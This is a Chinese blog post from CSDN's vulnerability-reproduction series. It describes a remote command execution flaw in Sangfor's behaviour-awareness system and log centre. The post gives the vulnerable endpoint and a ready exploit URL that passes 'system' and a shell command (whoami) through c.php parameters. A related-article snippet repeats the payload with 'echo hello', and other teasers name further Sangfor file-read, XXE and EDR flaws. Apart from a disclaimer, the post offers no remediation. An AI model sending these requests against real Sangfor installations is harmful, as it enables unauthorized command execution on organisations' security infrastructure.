深信服行为感知系统&&日志中心远程命令执行漏洞

最新推荐文章于 2025-04-25 14:24:38 发布

0x大先生

最新推荐文章于 2025-04-25 14:24:38 发布

阅读量3.2k

点赞数 1

CC 4.0 BY-SA版权

分类专栏：漏洞复现

本文链接：https://blog.youkuaiyun.com/user_hs/article/details/117676049

漏洞复现专栏收录该内容

27 篇文章

订阅专栏

本文揭示了深信服行为感知系统和日志中心存在的远程命令执行漏洞，详细描述了漏洞利用过程，包括通过/tool/log/c.php?strip_slashes=system参数触发命令执行。提醒用户勿用于非法测试，以免造成不良后果。影响范围明确，提供了漏洞复现步骤。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

声明

1、该公众号发布文章仅供学习使用。
2、请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

漏洞描述

深信服行为感知系统&&日志中心远程命令执行漏洞，使用与EDR相同模板和部分文件导致命令执行

影响范围

深信服行为感知系统和日志中心

漏洞复现

漏洞地址：

/tool/log/c.php?strip_slashes=system&host=

首页：
在这里插入图片描述
执行：

https://ip/tool/log/c.php?strip_slashes=system&host=whoami

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0x大先生

关注关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
3
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

深信服SG上网优化管理系统存在任意文件读取漏洞附POC

nnn2188185的博客

10-04

680

深信服SG上网优化管理系统 catjs.php接口存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器上的敏感文件。

[系统安全] 三十二.恶意代码检测(2)常用技术详解及总结

杨秀璋的专栏

07-16

9828

前文从产业界和学术界分别详细讲解恶意代码攻击溯源的相关知识，在学术界方面，用类似于综述来介绍攻击追踪溯源的不同方法；在产业界方面，主要参考李东宏老师从企业恶意样本分析的角度介绍溯源工作。这篇文章将详细总结恶意代码检测技术，包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。希望这篇文章对您有所帮助，如果文章中存在错误、理解不到位或侵权的地方，还请告知作者与海涵。且看且珍惜，加油~

3 条评论您还未登录，请先登录后发表或查看评论

深信服 行为感知系统 c.php 远程命令执行漏洞

weixin_46801402的博客

11-09

1102

深信服 行为感知系统 c.php 远程命令执行漏洞

深信服行为感知命令执行漏洞

剁椒鱼头没剁椒的博客

01-18

5264

深信服 行为感知系统c.php远程命令执行漏洞，使用与EDR相同模板和部分文件导致命令执行。其实整个过程和深信服EDR命令执行漏洞差不多。其实整个URL和EDR差不多。

深信服日志分析管理系统(SIP-Logger)彩页下载

最新发布

gitblog_06777的博客

04-25

832

深信服日志分析管理系统(SIP-Logger)彩页下载【下载地址】深信服日志分析管理系统SIP-Logger彩页下载 深信服日志分析管理系统(SIP-Logger)是一款专业的日志管理工具，旨在帮助企业高效管理和分析系统、网络及安全日志。它具备实时日志收集、强大的分析功能以及丰富的报表展示，支持分布式部署，确保数据安全...

深信服EDR漏洞复现

黑白的博客

11-06

1883

声明往后，复现的每个漏洞，我都会分享出来，希望可以通过这种方式，提高自己的能力，也希望大家可以一起学习，共同进步漏洞描述据说是有人把源码放网上了，不过看了看源码审计的骨偶成，也确实利用php反序列化，从而RCE 深信服终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理，支持对安全事件的一键隔离处置，以及对热点事件IOC

AC上网行为管理之行为感知系统部署

weixin_53946822的博客

11-21

361

1、目前支持 Windows Server 2008 及之后的服务器操作系统，并且系统要求是 64 位操作。2、在AC/SG设备中【系统管理】-【系统配置】-【日志中心配置】配置外置日志中心同步策略。1、在行为感知系统【系统配置】-【同步策略】建立同步策略与上网行为管理设备对接同步。1、内外置BA都支持【日志导出】功能，将审计的日志根据需要自定义导出。2、安装行为感知的服务器建议使用双核的CPU，内存2G以上。3、AC设备与外置数据中心通讯端口能正常通信。3、勾选导出内容和导出方式，即可将日志完成导出。

2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享！

记录开发和安全学习过程中的点点滴滴

04-22

3672

也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.

深信服云镜安全风险评估系统用户指南

- 日志审计：记录系统操作日志，便于追踪异常行为，支持日志筛选、导出和删除。 8. 安全评估 - 新建任务：创建不同类型的安全评估任务，包括资产发现、系统漏洞扫描、弱口令扫描、Web漏洞扫描和基线配置核查。 -...

深信服EDR-pt1 MSS板块小测练习

Jinmuyan_的博客

01-18

1100

A.针对服务经理已输出的服务汇报材料，按需补充相关内容后，提前预约客户对接人和决策人确定好时间，负责线下到客户现场，面向客户汇报服务的进度和成果以及下一步计划，输出会议纪要反馈给云端服务经理。B.了解项目风险，推动风险问题处置和闭环；C.针对服务经理已输出的外部启动会材料，按需补充相关内容后，提前预约客户对接人和决策人确定好时间，负责线下到客户现场召开服务启动会。A.负责针对首次威胁分析和运营过程中，发现存在的安全策略问题，进行加固或升级组件版本，并面向客户汇报所实施的加固内容。

深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞[2023-HW]

holyxp的博客

08-19

900

深信服 SG上网优化管理系统 catjs.php 存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器上的敏感文件

深信服行为感知系统和终端检测响应平台EDR REC复现渗透测试

kelenwait的博客

06-24

1983

简介 深信服行为感知系统和终端检测响应平台EDR是深信服科技股份有限公司推出的安全产品，其行为感知系统 c.php 存在远程命令执行漏洞，与其相同模板的还有部分EDR,同样导致远程命令执行。漏洞影响 深信服EDR 3.2.16 深信服EDR 3.2.17 深信服EDR 3.2.19 深信服 行为感知系统 漏洞复现登录界面 c.php 远程命令执行漏洞使用以下poc进行访问 /tool/log/c.php?strip_slashes=system&host=echo hello /tool/l

深信服edr终端漏洞

qq_40806924的博客

08-20

4601

一、前言最近这些天来了广州当蓝方，工作之余听到了几个朋友说关于深信服edr爆0day的情况，自己也没时间复现，就简单记录一下。该XXX简介： 深信服终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时，通过云网端联动协同、威胁情报共享、多层级响应机制，帮助用户快速处置终端安全问题，构建轻量级、智能化、响应快的下一代终端安全系统。 ** 二、影响范围 fofa上大概有37页

深信服台式感知平台补丁升级

modaner的博客

10-04

305

2、登录态势感知系统，在系统设置-升级管理-系统升级中进行升级。4、系统升级重启后，登录系统检查各项服务是否正常。1、登录深信服技术支持官网，下载最新版的升级包。3、导入刚刚下载的升级包。

【HW2020漏洞回顾】深信服EDR两大漏洞

wuguojie888的博客

08-20

9304

深信服终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理，支持对安全事件的一键隔离处置，以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中，少数系统可以通过外网地址访问。 NO.1 后台任意用户登陆漏洞【详情】攻击者可以通过构造payload绕过登录判断，直接拿到系统管理员/用户权..

深信服数据中心管理系统 XXE漏洞复现

0xSec

08-16

2782

深信服数据中心管理系统DC存在XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析，攻击者可以利用该漏洞进行XML注入攻击，获取系统敏感信息。

深信服 应用交付管理系统 login 存在远程命令执行漏洞

m0_52333295的博客

08-20

1502

深信服 应用交付管理系统 login 存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，执行任意命令。

深信服行为感知系统&&日志中心 远程命令执行漏洞

声明

漏洞描述

影响范围

漏洞复现

深信服行为感知系统&&日志中心远程命令执行漏洞